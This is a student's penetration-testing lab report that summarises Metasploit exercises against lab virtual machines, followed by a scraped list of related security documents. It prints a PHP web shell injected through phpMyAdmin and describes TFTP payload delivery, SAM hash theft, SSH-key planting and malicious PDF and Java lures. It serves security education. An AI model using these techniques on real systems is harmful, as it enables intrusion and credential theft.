Lab 7 - Exploitation 1. NCS 430 Penetration Testing Lab 7 Sunday, March 29, 2015 John Salamy
|
|
- Merry Reynolds
- 8 years ago
- Views:
Transcription
1 Lab 7 - Exploitation 1 NCS 430 Penetration Testing Lab 7 Sunday, March 29, 2015 John Salamy
2 Lab 7 - Exploitation 2 Item I. (What were you asked to do?) Metasploit Server Side Exploits Perform the exercises in chapter 8 of the Penetration Testing book Provide a summary of the exploits you performed and their results in your lab write up Password Attacks Perform the exercises in chapter 9 of the Penetration Testing book Provide as summary of the exploits you performed and their results in your lab write up Metasploit Client Side Exploits Perform the exercises in Chapter 10 of the Penetration Testing book Provide as summary of the exploits you performed and their results in your lab write up
3 Lab 7 - Exploitation 3 Item II. (What did you do?) Revisiting MS Metasploit payloads In this section of the lab we recreate the exploit that we did in Chapter 4. In this section we utilize the MS exploit to attack the Windows XP machine from the Kali virtual machine. This was fairly simple as this was previously completed in chapter 4. The options and results are in figure 1.1. Figure 1.1 Exploiting WebDav Default Credentials In the previous chapter we discovered that there was an installation of XAMPP running on the target XP machine. Since the credentials were not changed the default credentials are in place. This will allow us to upload our own items to the server. First we create a test.txt file and login to the server will the default credentials of wampp and xampp. We then upload our test.txt and attempt to reach the file with a web browser which was successful. See figure 1.2 and 1.3.
4 Lab 7 - Exploitation 4 Figure 1.2 Figure 1.3 Running a Script on the Target Web Server While uploading a text file is a success it is not able to do as much as a script would be able to do. Therefore in this section of the lab we upload a script to the same server with default credentials. See figure 1.4. Figure 1.4 shows a ls of the webdav directory which shows the test.php script that was uploaded. Figure 1.4
5 Lab 7 - Exploitation 5 Uploading a Msfvenom payload Uploading script will only get us so far on the target, it would be more beneficial to be able to upload msfvenom payload. This is because it is much easier to create a msfvenom payload then it would be to write a script. In this section we first create a msfvenom payload that will cause the infected system to open a session with the kali target. See figure 1.5. Figure 1.5 We next upload the payload to the same XAMPP server that had the default credentials. See figure 1.6. Figure 1.6 We then setup the handler that will accept the request that is generated upon execution of the payload. Then we set started the handler so that when the request was made it could exploit it and allow access to the system. See figure 1.7.
6 Lab 7 - Exploitation 6 Figure 1.7 Lastly we downloaded the file from the server and the payload was executed. It allowed the session to be created and the attacker was able to gain access to the system. See figure 1.8. Figure 1.8 Exploiting Open phpmyadmin The same server that we were previously able to exploit with default credentials also has an open phpmyadmin service which is able to be exploited. By navigating to the MyAdmin page on the server we are able to run an SQL query that will also allow us access to the target system. It will also enable us to be able to gain files as well as important information from the target. In the phpmyadmin shown in figure 1.9 we are able to run the following script SELECT "<?php system($_get['cmd']);?>" into outfile "C:\\xampp\\htdocs\\shell.php. This script will allow us to use the get command to obtain files off the server. To test the newly exploited vulnerability we tried to run ipconfig and were able to
7 Lab 7 - Exploitation 7 successfully do so see figure Figure 1.9 Figure 1.10 Downloading a File with TFTP In this section we attempt a second method for downloading files from our Kali machine. This method is to use TFTP. First we start the service using the following command: atftpd --daemon --bind-address /tmp. Next, we downlaod the file using the following command: get meterpreter.php C:\\xampp\\htdocs\\meterpreter.php.
8 Lab 7 - Exploitation 8 Downloading Sensitive Files In this section we focus again on exploiting XAMPP and downloading files from the target XP Machine. First we download the Zervit server configuration using the following command: Stored in this file are the hashes of the users passwords which can be obtained using a password cracker which we will discuss in the next chapter. The next file that we downlaod using this method is the SAM file. The SAM file is the Windows Security Accounts Manager file. This file stores the hashes for the user account passwords. We first try to do this on the currently running SAM file and this was unsuccessful see figure Therefore we obtained the files from the backup of the files. This method was successful and we were able to obtain the SAM and SYSTEM file. See figure 1.12 and Figure 1.11 Figure 1.12
9 Lab 7 - Exploitation 9 Figure 1.13 Exploiting a Buffer Overflow in Third-Party Software This section was designed to exploit the SL Mail program that is running on the Windows XP target. Unfortunately, it was unsuccessful due to the services on the XP Machine failing to launch. See figure These services were suppose to run on POP3 which would have enabled us to be able to exploit that service. This issue was not discovered until after the exploit failed to launch therefore figure 1.14 shows setting the options, figure 1.15 shows the exploit that failed, and figure 1.16 shows the service that would not start. Figure 1.14 Figure 1.15
10 Lab 7 - Exploitation 10 Figure 1.16 Exploiting Third-Party Web Applications Unfortunately, similar to the previous section of the lab this section failed to launch successfully. I was able to load the module and set the options but the exploit would not launch the payload. It was able to figure out server information but not launch the payload. This was the same issue that others in the class were having as well. See figure 1.17.
11 Lab 7 - Exploitation 11 Figure 1.17 Exploiting a Compromised Service This section focuses on how to exploit a vulnerability in the Very Secure FTP This exploit involves placing a smiley face after the username and then entering any password. If the service is vulnerable it will allow access to the system. In our case it was vulnerable.(figure 1.18) We were then able to start a netcat session. (Figure 1.19) Figure 1.18 Figure 1.19 Exploiting Open NFS Shares In this section we exploit the vulnerability that was discovered in the first hacking challenge that we completed. First we start by mounting an NFS share. We then cs to the mount and view the contents of the.ssh directory. In the directory are the public and private keys as well as the authorized keys. See figure 1.20.
12 Lab 7 - Exploitation 12 Figure 1.20 Next we generate new SSH keys using the default options. See figure 1.21 Figure 1.21
13 Lab 7 - Exploitation 13 Next we added our key to the targets list of authorized keys. Once we have done that we are able to gain SSH access to the system without the need for a password. See figure Figure 1.22
14 Lab 7 - Exploitation 14 Chapter 9 focuses on password attacks. It starts with the basics such as what a password list is as well as what a username list it. It then discusses as tool called crunch which will generate a brute force list based on the given parameters. See figure 2.1 for an example. Figure 2.1 Guessing Usernames and Passwords with Hydra This section utilizes the POP3 service that we were not able to run in chapter 8, therefore this was unsuccessful and not able to be completed. Recovering Password Hashes from a Windows SAM file In this section we use the files obtained in chapter 8 to try and determine the passwords for the users of the Windows XP target. We utilize the bkhive program on the key that we obtained and it returned the Root Key and the Boot Key. We then input this information into the samdump2 program and are able to determine the hashes. Dumping Passwords with Physical Access We do not have physical access to the system therefore we could not complete this section.
15 Lab 7 - Exploitation 15 All Ports The allports module in metasploit will try to set up a connection on each port until it finds a successful port. This can be very useful if there is a firewall in place and we do not know which port can be leveraged. In this section we attempt this attack on the Windows XP system. See figure 2.2, 2.3, 2.4. Figure 2.2 Figure 2.3 Figure 2.4 Browser Exploitation Since different types of traffic can be filtered we can utilize HTTP which is very commonly allowed through the firewall because it is essential. It can be filtered based on certain parameters but good attacks can bypass these filters. These types of attacks will be demonstrated in this section. The module we will use in metasploit is aurora. We set the options and then begin the service which can be used until out target connects back to the system. See figure 2.5.
16 Lab 7 - Exploitation 16 Figure 2.5 Now we would utilize some sort of social engineering or spam to get our target to connect to the needed web address. Once we do that the exploit is completed and we obtain a session with the target. See figure 2.6. Figure 2.6 The problem with the above solution is that it causes the targets Internet Explorer to stop responding causing them to close the program. When they close the program that causes our session to be closed. Therefore the more practical application of the attack would be to have the target immediately migrate the session to a separate process that way it is persistent. This is exactly what we did in this section and is demonstrated in figure 2.7.
17 Lab 7 - Exploitation 17 Figure 2.7 PDF Exploits In this section we package an exploit into a PDF that way we are able to have our target open the PDF to launch the attack and gain access. We start by using the adobe_utilprintf module of metasploit to make the pdf. No options need to be set to create the PDF. We then moved the files to the apache server on our local system so they can be accessed. See figure 2.8. See figure 2.8 We then start the reverse handler on the Kali system to get the incoming request to be able to exploit it. We then start the handler and direct the target to the file and we have established a session. See figure 2.9.
18 Lab 7 - Exploitation 18 Figure 2.9 We then run into an issue where the handler closes after the first system is attached. Therefore we set the advanced options in the handler to allow for multiple sessions see figure Figure 2.10 PDF Embedded Executable In this section we bundle a malicious payload inside a PDF to exploit the target system. The first step is to create the PDF. Unfortunately the PDF file is not where the book says to find it. First I had to use locate to the find the file. See figure Figure 2.11 I then tried to change the filetype to a regular PDF since it was.pdf.gz and the module would not accept it. Unfortunately it was unsuccessful and would not accept the file. See figure 2.12, 2.13, 2.14.
19 Lab 7 - Exploitation 19 Figure 2.12 Figure 2.13 Figure 2.14 Java Exploits In this section we set up a scenario very similar to the one with Adobe. We start by creating the malicious payload using similar options to the other modules. The module used is the java_jre17_jmxbean. The options for the module were set in figure 2.15, we then started the service. Next we directed the target to the URL and the connection was established in figure Figure 2.15
20 Lab 7 - Exploitation 20 Figure 2.16 Signed Java Applet This module in metasploit is very similar to the previous module. The benefit is that no vulnerability is needed because we ask the user to approve the action. While it seems like doing this would be unsuccessful many users to not bother to read the messages and just approve the action. The options for the module were set in figure 2.17 and we began the exploit. Figure 2.17 We then connected the target to the URL listed. Upon loading the page the user is asked to approve the action, see figure 2.18.
21 Lab 7 - Exploitation 21 Figure 2.18 Once the user clicks run we are then able to obtain access to the system. See figure 2.19 Figure 2.19 browser_autopwn Unfortunately, this module would not run successfully, it was tried multiple times and we always received back that there were no exploit modules. See figure 2.20
22 Lab 7 - Exploitation 22 Figure 2.20 The last section was the Winamp section. In this section we convince the user to install a vulnerable skin that will allow us access to the target system. First we have to create the malicious file to place in the skin files. We do this by using a metasploit module named winamp_maki_bof. Once we set the options the malicious file is created see figure Figure 2.21
23 Lab 7 - Exploitation 23 We then send the file to the apache server so that it can be access from the other systems. Next we copied the default skin for Winamp and rename it rocketship. We then replace the mcvcore.maki with the malicious file that we created. We then set the skin in Winampp to the malicious skin, once we do this Winamp will close and we then have an open session to the Windows 7 target. Difficulties Through out the lab we faced many difficulties that caused many of the sections to not function properly. For example the POP3 service would not start which caused parts of Chapter 8 not work, which then caused part of chapter 9 not to function. Another issue that was present was that the User Manual file would not be accepted by the metasploit module because it said it was not the correct format. In addition some of the instructions in the text were vague which resulted in having to complete some steps several times before the user is able to properly interpret the instructions. One of the greatest points of frustration was when trying to complete the lab was that the book says to kill the handler job and that you can just start it back up but every time I did this I was not able to bring the handler back up. Each time the handler was started and no session was started I would have to reboot the entire VM before I could relaunch the handler. What did I learn? While there were frustrating moments in the lab in the end I did learn a lot. Firstly, I learned many different ways to obtain access to a system besides the traditional ways that were learned in previous chapters. The lab also caused me to think twice anytime I skip an update for a piece of software. I always knew how important software updates were but never realized how easy it was to exploit an outdated version of Java. In addition I learned how easy it was to create malicious payloads and place them into a file or link to a malicious website. It may be that I was naive but I always thought these types of exploits took someone with a high level of programming knowledge but it turns out it doesn't. This lab was definitely an eye-opener.
Penetration Testing with Kali Linux
Penetration Testing with Kali Linux PWK Copyright 2014 Offensive Security Ltd. All rights reserved. Page 1 of 11 All rights reserved to Offensive Security, 2014 No part of this publication, in whole or
More informationPenetration Testing Report Client: Business Solutions June 15 th 2015
Penetration Testing Report Client: Business Solutions June 15 th 2015 Acumen Innovations 80 S.W 8 th St Suite 2000 Miami, FL 33130 United States of America Tel: 1-888-995-7803 Email: info@acumen-innovations.com
More informationVulnerability Assessment and Penetration Testing
Vulnerability Assessment and Penetration Testing Module 1: Vulnerability Assessment & Penetration Testing: Introduction 1.1 Brief Introduction of Linux 1.2 About Vulnerability Assessment and Penetration
More informationMake a folder named Lab3. We will be using Unix redirection commands to create several output files in that folder.
CMSC 355 Lab 3 : Penetration Testing Tools Due: September 31, 2010 In the previous lab, we used some basic system administration tools to figure out which programs where running on a system and which files
More informationNCS 430 Penetration Testing Lab #2 Tuesday, February 10, 2015 John Salamy
1 NCS 430 Penetration Testing Lab #2 Tuesday, February 10, 2015 John Salamy 2 Item I. (What were you asked to do?) Complete Metasploit: Quick Test on page 88-108 of the Penetration Testing book. Complete
More informationSTABLE & SECURE BANK lab writeup. Page 1 of 21
STABLE & SECURE BANK lab writeup 1 of 21 Penetrating an imaginary bank through real present-date security vulnerabilities PENTESTIT, a Russian Information Security company has launched its new, eighth
More informationSYWorks Vulnerable Web Applications Compilation For Penetration Testing Installation Guide
SYWorks Vulnerable Web Applications Compilation For Penetration Testing Installation Guide This document provides installation guide on how to create your own penetration testing environment with the pre-installed
More informationCourse Duration: 80Hrs. Course Fee: INR 7000 + 1999 (Certification Lab Exam Cost 2 Attempts)
Course Duration: 80Hrs. Course Fee: INR 7000 + 1999 (Certification Lab Exam Cost 2 Attempts) Course Module: 1. Introduction to Ethical Hacking 2. Footprinting a. SAM Spade b. Nslookup c. Nmap d. Traceroute
More informationPenetration Testing Walkthrough
Penetration Testing Walkthrough Table of Contents Penetration Testing Walkthrough... 3 Practical Walkthrough of Phases 2-5... 4 Chose Tool BackTrack (Armitage)... 5 Choose Target... 6 Phase 2 - Basic Scan...
More informationPost Exploitation. n00bpentesting.com
Post Exploitation n00bpentesting.com Prerequisites Hardware Software Topics Covered A Note Before You Begin Lab 0ne Post Exploitation What s Next? 3 3 3 4 4 4 5 8 2 Prerequisites Thank you for downloading
More informationTraining module 2 Installing VMware View
Training module 2 Installing VMware View In this second module we ll install VMware View for an End User Computing environment. We ll install all necessary parts such as VMware View Connection Server and
More informationMetasploit ing the target machine is a fascinating subject to all security professionals. The rich list of exploit codes and other handy modules of
Metasploit ing the target machine is a fascinating subject to all security professionals. The rich list of exploit codes and other handy modules of Metasploit Framework make the penetrators life quite
More informationBackup and Restore MySQL Databases
Backup and Restore MySQL Databases As you use XAMPP, you might find that you need to backup or restore a MySQL database. There are two easy ways to do this with XAMPP: using the browser-based phpmyadmin
More informationProtecting Your Organisation from Targeted Cyber Intrusion
Protecting Your Organisation from Targeted Cyber Intrusion How the 35 mitigations against targeted cyber intrusion published by Defence Signals Directorate can be implemented on the Microsoft technology
More informationNetwork Security EDA491 2011/2012. Laboratory assignment 4. Revision A/576, 2012-05-04 06:13:02Z
Network Security EDA491 2011/2012 Laboratory assignment 4 Revision A/576, 2012-05-04 06:13:02Z Lab 4 - Network Intrusion Detection using Snort 1 Purpose In this assignment you will be introduced to network
More informationNetwork and Host-based Vulnerability Assessment
Network and Host-based Vulnerability Assessment A guide for information systems and network security professionals 6600 Peachtree-Dunwoody Road 300 Embassy Row Atlanta, GA 30348 Tel: 678.443.6000 Toll-free:
More informationIS L06 Protect Servers and Defend Against APTs with Symantec Critical System Protection
IS L06 Protect Servers and Defend Against APTs with Symantec Critical System Protection Description Lab flow At the end of this lab, you should be able to Discover how to harness the power and capabilities
More informationABC LTD EXTERNAL WEBSITE AND INFRASTRUCTURE IT HEALTH CHECK (ITHC) / PENETRATION TEST
ABC LTD EXTERNAL WEBSITE AND INFRASTRUCTURE IT HEALTH CHECK (ITHC) / PENETRATION TEST Performed Between Testing start date and end date By SSL247 Limited SSL247 Limited 63, Lisson Street Marylebone London
More information1. Building Testing Environment
The Practice of Web Application Penetration Testing 1. Building Testing Environment Intrusion of websites is illegal in many countries, so you cannot take other s web sites as your testing target. First,
More informationMIGRATING TO AVALANCHE 5.0 WITH MS SQL SERVER
MIGRATING TO AVALANCHE 5.0 WITH MS SQL SERVER This document provides instructions for migrating to Avalanche 5.0 from an installation of Avalanche MC 4.6 or newer using MS SQL Server 2005. You can continue
More informationInternal Penetration Test
Internal Penetration Test Agenda Time Agenda Item 10:00 10:15 Introduction 10:15 12:15 Seminar: Web Application Penetration Test 12:15 12:30 Break 12:30 13:30 Seminar: Social Engineering Test 13:30 15:00
More informationNETWORK PENETRATION TESTS FOR EHR MANAGEMENT SOLUTIONS PROVIDER
A C a s e s t u d y o n h o w Z e n Q h a s h e l p e d a L e a d i n g K - 1 2 E d u c a t i o n & L e a r n i n g S o l u t i o n s P r o v i d e r i n U S g a u g e c a p a c i t y o f t h e i r f l
More informationMigrating helpdesk to a new server
Migrating helpdesk to a new server Table of Contents 1. Helpdesk Migration... 2 Configure Virtual Web on IIS 6 Windows 2003 Server:... 2 Role Services required on IIS 7 Windows 2008 / 2012 Server:... 2
More informationEVault for Data Protection Manager. Course 361 Protecting Linux and UNIX with EVault
EVault for Data Protection Manager Course 361 Protecting Linux and UNIX with EVault Table of Contents Objectives... 3 Scenario... 3 Estimated Time to Complete This Lab... 3 Requirements for This Lab...
More informationFINAL DoIT 04.01.2013- v.8 APPLICATION SECURITY PROCEDURE
Purpose: This procedure identifies what is required to ensure the development of a secure application. Procedure: The five basic areas covered by this document include: Standards for Privacy and Security
More informationConfiguring WildFire. Version 1.0 PAN-OS 5.0.1. Johan Loos. johan@accessdenied.be
Configuring WildFire Version 1.0 PAN-OS 5.0.1 Johan Loos johan@accessdenied.be WildFire Overview WildFire is a cloud based malware detection service. Basically is the idea when the user downloads a file,
More informationWeb attacks and security: SQL injection and cross-site scripting (XSS)
Web attacks and security: SQL injection and cross-site scripting (XSS) License This work by Z. Cliffe Schreuders at Leeds Metropolitan University is licensed under a Creative Commons Attribution-ShareAlike
More informationFive Steps to Improve Internal Network Security. Chattanooga Information security Professionals
Five Steps to Improve Internal Network Security Chattanooga Information security Professionals Who Am I? Security Analyst: Sword & Shield Blogger: averagesecurityguy.info Developer: github.com/averagesecurityguy
More informationVMTurbo Operations Manager 4.5 Installing and Updating Operations Manager
VMTurbo Operations Manager 4.5 Installing and Updating Operations Manager VMTurbo, Inc. One Burlington Woods Drive Burlington, MA 01803 USA Phone: (781) 373---3540 www.vmturbo.com Table of Contents Introduction
More informationIP Application Security Manager and. VMware vcloud Air
Securing Web Applications with F5 BIG- IP Application Security Manager and VMware vcloud Air D E P L O Y M E N T G U I D E Securing Web Applications Migrating application workloads to the public cloud
More informationAndreas Dittrich, Philipp Reinecke Testing of Network and System Security. example.
Testing of Network and System Security 1 Testing of Network and System Security Introduction The term security when applied to computer networks conveys a plethora of meanings, ranging from network security
More informationA New Era. A New Edge. Phishing within your company
Phishing within your company Learning Objectives What is phishing and how to minimize its impact Obtain a basic understanding of how to use virtual machines Use BackTrack, a tool used by many security
More informationOracle Solaris Remote Lab User Guide for Release 1.01
Oracle Solaris Remote Lab User Guide for Release 1.01 Table of Contents 1. INTRODUCTION... 1 PURPOSE OF THE OSRL... 1 GAINING ACCESS TO THE OSRL... 2 Request access to the Oracle Solaris Remote Lab...
More informationHow to hack a website with Metasploit
How to hack a website with Metasploit By Sumedt Jitpukdebodin Normally, Penetration Tester or a Hacker use Metasploit to exploit vulnerability services in the target server or to create a payload to make
More informationFREQUENTLY ASKED QUESTIONS
FREQUENTLY ASKED QUESTIONS Secure Bytes, October 2011 This document is confidential and for the use of a Secure Bytes client only. The information contained herein is the property of Secure Bytes and may
More informationTIMETABLE ADMINISTRATOR S MANUAL
2015 TIMETABLE ADMINISTRATOR S MANUAL Software Version 5.0 BY GEOFFPARTRIDGE.NET TABLE OF CONTENTS TOPIC PAGE 1) INTRODUCTION 1 2) TIMETABLE SPECIFICATIONS 1 3) SOFTWARE REQUIRED 1 a. Intranet Server (XAMPP
More informationSecurity Threat Kill Chain What log data would you need to identify an APT and perform forensic analysis?
Security Threat Kill Chain What log data would you need to identify an APT and perform forensic analysis? This paper presents a scenario in which an attacker attempts to hack into the internal network
More informationAdvanced Web Security, Lab
Advanced Web Security, Lab Web Server Security: Attacking and Defending November 13, 2013 Read this earlier than one day before the lab! Note that you will not have any internet access during the lab,
More informationUsing Internet or Windows Explorer to Upload Your Site
Using Internet or Windows Explorer to Upload Your Site This article briefly describes what an FTP client is and how to use Internet Explorer or Windows Explorer to upload your Web site to your hosting
More informationMySQL Quick Start Guide
Quick Start Guide MySQL Quick Start Guide SQL databases provide many benefits to the web designer, allowing you to dynamically update your web pages, collect and maintain customer data and allowing customers
More informationRunning a Default Vulnerability Scan
Running a Default Vulnerability Scan A Step-by-Step Guide www.saintcorporation.com Examine. Expose. Exploit. Welcome to SAINT! Congratulations on a smart choice by selecting SAINT s integrated vulnerability
More informationSystem Administration Training Guide. S100 Installation and Site Management
System Administration Training Guide S100 Installation and Site Management Table of contents System Requirements for Acumatica ERP 4.2... 5 Learning Objects:... 5 Web Browser... 5 Server Software... 5
More informationHow To Install Amyshelf On Windows 2000 Or Later
Contents I Table of Contents Part I Document Overview 2 Part II Document Details 3 Part III Setup 4 1 Download & Installation... 4 2 Configure MySQL... Server 6 Windows XP... Firewall Settings 13 3 Additional
More informationFTP, IIS, and Firewall Reference and Troubleshooting
FTP, IIS, and Firewall Reference and Troubleshooting Although Cisco VXC Manager automatically installs and configures everything you need for use with respect to FTP, IIS, and the Windows Firewall, the
More informationExploiting Fundamental Weaknesses in Command and Control (C&C) Panels
Exploiting Fundamental Weaknesses in Command and Control (C&C) Panels What Goes Around Comes Back Around! Aditya K Sood Senior Security Researcher and Engineer 1 Dr. Aditya K Sood About the Speaker! Senior
More informationSEAGATE BUSINESS NAS ACCESSING THE SHELL. February 1, 2014 by Jeroen Diel IT Nerdbox
SEAGATE BUSINESS NAS ACCESSING THE SHELL February 1, 2014 by Jeroen Diel IT Nerdbox P a g e 1 Table of Contents Introduction... 2 Technical specifications... 3 Gaining access to the shell... 4 Enable the
More informationPTSv2 in pills: The Best First for Beginners who want to become Penetration Testers. Self-paced, online, flexible access
The Best First for Beginners who want to become Penetration Testers PTSv2 in pills: Self-paced, online, flexible access 900+ interactive slides and 3 hours of video material Interactive and guided learning
More informationTwo Novel Server-Side Attacks against Log File in Shared Web Hosting Servers
Two Novel Server-Side Attacks against Log File in Shared Web Hosting Servers Seyed Ali Mirheidari 1, Sajjad Arshad 2, Saeidreza Khoshkdahan 3, Rasool Jalili 4 1 Computer Engineering Department, Sharif
More informationVulnerability analysis
Vulnerability analysis License This work by Z. Cliffe Schreuders at Leeds Metropolitan University is licensed under a Creative Commons Attribution-ShareAlike 3.0 Unported License. Contents License Contents
More informationPenetration Testing LAB Setup Guide
Penetration Testing LAB Setup Guide (External Attacker - Intermediate) By: magikh0e - magikh0e@ihtb.org Last Edit: July 06 2012 This guide assumes a few things... 1. You have read the basic guide of this
More informationWEB APPLICATION HACKING. Part 2: Tools of the Trade (and how to use them)
WEB APPLICATION HACKING Part 2: Tools of the Trade (and how to use them) Jonathan Eddy September 27, 2013 Last Updated September 27, 2013 MAPPING THE APPLICATION 4 2 ENUMERATING CONTENT AND FUNCTIONALITY
More informationInstalling Drupal on Your Local Computer
Installing Drupal on Your Local Computer This tutorial will help you install Drupal on your own home computer and allow you to test and experiment building a Web site using this open source software. This
More information1 Recommended Readings. 2 Resources Required. 3 Compiling and Running on Linux
CSC 482/582 Assignment #2 Securing SimpleWebServer Due: September 29, 2015 The goal of this assignment is to learn how to validate input securely. To this purpose, students will add a feature to upload
More informationAttack and Penetration Testing 101
Attack and Penetration Testing 101 Presented by Paul Petefish PaulPetefish@Solutionary.com July 15, 2009 Copyright 2000-2009, Solutionary, Inc. All rights reserved. Version 2.2 Agenda Penetration Testing
More informationCustomer Control Panel Manual
Customer Control Panel Manual Contents Introduction... 2 Before you begin... 2 Logging in to the Control Panel... 2 Resetting your Control Panel password.... 3 Managing FTP... 4 FTP details for your website...
More informationWeb Application Threats and Vulnerabilities Web Server Hacking and Web Application Vulnerability
Web Application Threats and Vulnerabilities Web Server Hacking and Web Application Vulnerability WWW Based upon HTTP and HTML Runs in TCP s application layer Runs on top of the Internet Used to exchange
More informationCyber Essentials. Test Specification
Cyber Essentials Test Specification Contents Scope of the Audit...2 Assumptions...3 Success Criteria...3 External systems...4 Required tests...4 Test Details...4 Internal systems...7 Tester pre-requisites...8
More informationInternet Security [1] VU 184.216. Engin Kirda engin@infosys.tuwien.ac.at
Internet Security [1] VU 184.216 Engin Kirda engin@infosys.tuwien.ac.at Christopher Kruegel chris@auto.tuwien.ac.at Administration Challenge 2 deadline is tomorrow 177 correct solutions Challenge 4 will
More informationKaseya Server Instal ation User Guide June 6, 2008
Kaseya Server Installation User Guide June 6, 2008 About Kaseya Kaseya is a global provider of IT automation software for IT Solution Providers and Public and Private Sector IT organizations. Kaseya's
More informationHacking Database for Owning your Data
Hacking Database for Owning your Data 1 Introduction By Abdulaziz Alrasheed & Xiuwei Yi Stealing data is becoming a major threat. In 2012 alone, 500 fortune companies were compromised causing lots of money
More informationQuick Start Guide. Cerberus FTP is distributed in Canada through C&C Software. Visit us today at www.ccsoftware.ca!
Quick Start Guide Cerberus FTP is distributed in Canada through C&C Software. Visit us today at www.ccsoftware.ca! How to Setup a File Server with Cerberus FTP Server FTP and SSH SFTP are application protocols
More informationCentral Administration QuickStart Guide
Central Administration QuickStart Guide Contents 1. Overview... 2 Licensing... 2 Documentation... 2 2. Configuring Central Administration... 3 3. Using the Central Administration web console... 4 Managing
More informationJoomla Admin Protection
Joomla Admin Protection We congratulate you on installation of our plug-in that will not only help you to protect your website but will also make your work with CMS much easier and secure. Our plug-in
More informationBuild it with Drupal 8
Build it with Drupal 8 Comprehensive guide for building common websites in Drupal 8. No programming knowledge required! Antonio Torres This book is for sale at http://leanpub.com/drupal-8-book This version
More informationIs Drupal secure? A high-level perspective on web vulnerabilities, Drupal s solutions, and how to maintain site security
Is Drupal secure? A high-level perspective on web vulnerabilities, Drupal s solutions, and how to maintain site security Presented 2009-05-29 by David Strauss Thinking Securely Security is a process, not
More informationRunning a Default Vulnerability Scan SAINTcorporation.com
SAINT Running a Default Vulnerability Scan A Step-by-Step Guide www.saintcorporation.com Examine. Expose. Exploit. Install SAINT Welcome to SAINT! Congratulations on a smart choice by selecting SAINT s
More informationExternal Vulnerability Assessment. -Technical Summary- ABC ORGANIZATION
External Vulnerability Assessment -Technical Summary- Prepared for: ABC ORGANIZATI On March 9, 2008 Prepared by: AOS Security Solutions 1 of 13 Table of Contents Executive Summary... 3 Discovered Security
More informationPenetration Testing LAB Setup Guide
Penetration Testing LAB Setup Guide (Internal Attacker - Beginner version) By: magikh0e - magikh0e@ihtb.org Last Edit: July 07 2012 This guide assumes a few things... 1. You have installed Backtrack before
More informationWeb Application Security
E-SPIN PROFESSIONAL BOOK Vulnerability Management Web Application Security ALL THE PRACTICAL KNOW HOW AND HOW TO RELATED TO THE SUBJECT MATTERS. COMBATING THE WEB VULNERABILITY THREAT Editor s Summary
More informationIntroduction to Computer Security
Introduction to Computer Security Web Application Security Pavel Laskov Wilhelm Schickard Institute for Computer Science Modern threat landscape The majority of modern vulnerabilities are found in web
More informationASL IT Security Advanced Web Exploitation Kung Fu V2.0
ASL IT Security Advanced Web Exploitation Kung Fu V2.0 A S L I T S e c u r i t y P v t L t d. Page 1 Overview: There is a lot more in modern day web exploitation than the good old alert( xss ) and union
More informationReference and Troubleshooting: FTP, IIS, and Firewall Information
APPENDIXC Reference and Troubleshooting: FTP, IIS, and Firewall Information Although Cisco VXC Manager automatically installs and configures everything you need for use with respect to FTP, IIS, and the
More information13.1 Backup virtual machines running on VMware ESXi / ESX Server
13 Backup / Restore VMware Virtual Machines Tomahawk Pro This chapter describes how to backup and restore virtual machines running on VMware ESX, ESXi Server or VMware Server 2.0. 13.1 Backup virtual machines
More informationPolar Help Desk Installation Guide
Polar Help Desk Installation Guide Copyright (legal information) Copyright Polar 1995-2005. All rights reserved. The information contained in this document is proprietary to Polar and may not be used or
More informationCybernetic Proving Ground
Cybernetic Proving Ground Penetration Testing Scenario Jakub Čegan, Martin Vizváry, Michal Procházka cegan@ics.muni.cz Institute of Computer Science, Masaryk University About The Scenario "In this game
More informationSmartphone Pentest Framework v0.1. User Guide
Smartphone Pentest Framework v0.1 User Guide 1 Introduction: The Smartphone Pentest Framework (SPF) is an open source tool designed to allow users to assess the security posture of the smartphones deployed
More informationPenetration Test Report
Penetration Test Report MegaCorp One August 10 th, 2013 Offensive Security Services, LLC 19706 One Norman Blvd. Suite B #253 Cornelius, NC 28031 United States of America Tel: 1-402-608-1337 Fax: 1-704-625-3787
More informationApplication Security Testing. Generic Test Strategy
Application Security Testing Generic Test Strategy Page 2 of 8 Contents 1 Introduction 3 1.1 Purpose: 3 1.2 Application Security Testing: 3 2 Audience 3 3 Test Strategy guidelines 3 3.1 Authentication
More informationequate Installation QUICK START GUIDE
equate Installation QUICK START GUIDE CONTENTS 1 Before You Begin 2 Server Installation 3 Server Configuration 3a Connecting to VirtueMart / Prestashop 4 Client Installation (Windows) 5 Client Installation
More informationComodo Endpoint Security Manager SME Software Version 2.1
Comodo Endpoint Security Manager SME Software Version 2.1 Quick Start Guide Guide Version 2.1.111114 Comodo Security Solutions 1255 Broad Street Clifton, NJ 07013 Endpoint Security Manager - SME Quick
More informationInstallation Guide for WebSphere Application Server (WAS) and its Fix Packs on AIX V5.3L
Installation Guide for WebSphere Application Server (WAS) and its Fix Packs on AIX V5.3L Introduction: This guide is written to help any person with little knowledge in AIX V5.3L to prepare the P Server
More informationCA arcserve Unified Data Protection Agent for Linux
CA arcserve Unified Data Protection Agent for Linux User Guide Version 5.0 This Documentation, which includes embedded help systems and electronically distributed materials, (hereinafter referred to as
More informationFive Steps to Improve Internal Network Security. Chattanooga ISSA
Five Steps to Improve Internal Network Security Chattanooga ISSA 1 Find Me AverageSecurityGuy.info @averagesecguy stephen@averagesecurityguy.info github.com/averagesecurityguy ChattSec.org 2 Why? The methodical
More informationWeb Application Security Payloads. Andrés Riancho Director of Web Security OWASP AppSec USA 2011 - Minneapolis
Web Application Security Payloads Andrés Riancho Director of Web Security OWASP AppSec USA 2011 - Minneapolis Topics Short w3af introduction Automating Web application exploitation The problem and how
More informationAdvanced Endpoint Protection Overview
Advanced Endpoint Protection Overview Advanced Endpoint Protection is a solution that prevents Advanced Persistent Threats (APTs) and Zero-Day attacks and enables protection of your endpoints by blocking
More informationNTT Web Hosting Service [User Manual]
User Version 0.11 August 22, 2014 NTT Web Hosting Service [User Manual] Presented By: OAM Linux A NTT Communications (Thailand) CO., LTD. Table of Contents NTT Web Hosting Service [User Manual] 1 General...
More informationIDS and Penetration Testing Lab ISA656 (Attacker)
IDS and Penetration Testing Lab ISA656 (Attacker) Ethics Statement Network Security Student Certification and Agreement I,, hereby certify that I read the following: University Policy Number 1301: Responsible
More informationNetworks and Security Lab. Network Forensics
Networks and Security Lab Network Forensics Network Forensics - continued We start off from the previous week s exercises and analyze each trace file in detail. Tools needed: Wireshark and your favorite
More information1. Introduction. 2. Web Application. 3. Components. 4. Common Vulnerabilities. 5. Improving security in Web applications
1. Introduction 2. Web Application 3. Components 4. Common Vulnerabilities 5. Improving security in Web applications 2 What does World Wide Web security mean? Webmasters=> confidence that their site won
More informationSecure Web Development Teaching Modules 1. Security Testing. 1.1 Security Practices for Software Verification
